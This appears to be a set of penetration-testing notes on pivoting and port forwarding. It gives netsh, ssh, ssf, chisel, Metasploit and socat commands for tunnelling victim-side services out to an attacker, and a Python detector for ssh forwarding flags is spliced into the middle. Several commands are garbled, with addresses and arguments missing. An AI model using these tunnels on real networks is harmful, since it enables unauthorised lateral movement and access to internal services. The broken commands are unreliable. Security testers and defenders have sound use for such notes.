netsh advfirewall firewall add rule name="<rulename>" dir=in action=allow protocol=TCP localport=8080
netsh interface portproxy add v4tov4 listenport=8080 listenaddress= connectport=80 connectaddress=<addr>



./ssfd -p 8080


./ssf -L 9000: -p 8080
./ssf -R 9000: -p 8080


Static port forwarding (single port, execute on attacker)

ssh <user>@<target> -L <localport>:<targetip>:<targetport>

Dynamic Port Forwarding (execute on attacker)

ssh -D <localport> user@host

Remote forwarding (execute on victim)

ssh -R <lport>:<ip>:<rport> user@attacker

Jump Host

ssh -J jumpuser1@jumphost1,jumpuser2@jumphost2,...,jumpuserN@jumphostN user@host
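For spotting the ssh forwards above in process command-line telemetry, an added example (not part of the original notes): it walks an ssh argv the way the client does and reports each -L, -R, -D and -J option. It goes beyond the flags listed here by also catching bundled flags, options placed after the destination, and the equivalent -o forms. The sample command lines, hosts and ports are constructed.

```python
import shlex

# OpenSSH client options that consume an argument (per the ssh(1) man page).
ARG_OPTS = set("BbcDEeFIiJLlmOoPpQRSWw")
KINDS = {"L": "local", "R": "remote", "D": "dynamic", "J": "jump"}
O_KINDS = {"localforward": "local", "remoteforward": "remote",
           "dynamicforward": "dynamic", "proxyjump": "jump"}

def ssh_forwards(cmdline):
    """Return [(kind, spec)] for each forwarding option ssh itself would parse."""
    argv = shlex.split(cmdline)
    found, seen_dest, i = [], False, 1
    while i < len(argv):
        arg = argv[i]
        if not arg.startswith("-") or arg == "-":
            if seen_dest:
                break              # second bare word starts the remote command
            seen_dest = True       # ssh also accepts options after the destination
            i += 1
            continue
        for j, flag in enumerate(arg[1:], start=1):
            if flag not in ARG_OPTS:
                continue           # bundled boolean flag, e.g. N and f in -NfR
            value = arg[j + 1:]    # attached form: -L8080:host:80
            if not value and i + 1 < len(argv):
                i += 1
                value = argv[i]    # detached form: -L 8080:host:80
            if flag in KINDS:
                found.append((KINDS[flag], value))
            elif flag == "o":      # -o RemoteForward=... or -o "ProxyJump host"
                key, _, val = value.replace("=", " ", 1).partition(" ")
                if key.lower() in O_KINDS:
                    found.append((O_KINDS[key.lower()], val.strip()))
            break                  # rest of the token was this option's value
        i += 1
    return found

# Constructed sample command lines (hosts and ports are made up).
SAMPLES = [
    "ssh user@10.0.0.5 -L 8080:10.0.1.20:80",
    "ssh -NfR9000:127.0.0.1:8089 user@192.0.2.10",
    'ssh -o "RemoteForward=9000 127.0.0.1:80" -p 2222 user@host uname -a',
    "ssh user@host ls -L /tmp",        # -L belongs to ls, not to ssh
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(ssh_forwards(line) or "no forwarding", "<-", line)
```

A plain substring match on "-L" or "-R" misses the bundled and -o forms and flags the last sample, which is why the argv is walked instead.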


Forward port 8089, listening on localhost on the victim, out to the attacker:

victim> ./chisel server -p 5000
attacker> ./chisel client 8089


Remote Forward (opens 6443 on remote and forwards to local)

portfwd add -R -p 6443 -l 443 -L

Note: Chaining multiple forwards often leads to Metasploit timeouts/crashes. In this case it's best to forward just a single hop via Metasploit and use another technique for the next hop (e.g. default Windows forwarding).


Get a session on a box that can reach the server, then run autoroute -s addr/subnet. Alternatively, you can add these manually via route add addr/subnet <session>. Start the socks4a proxy module. Now we can use socat to make the server locally available:

proxychains socat TCP4-Listen:1433,fork TCP:<>:1433

Now a Windows machine in the same network can connect via Windows authentication:

C:\Program Files (x86)\Microsoft SQL Server Management Studio 18\Common7\IDE>runas /netonly /user:<>\<> "Ssms.exe -S <local box>"

An alternative to autoroute is to use this syntax outside of any sessions:

route add <>/<> <session id>
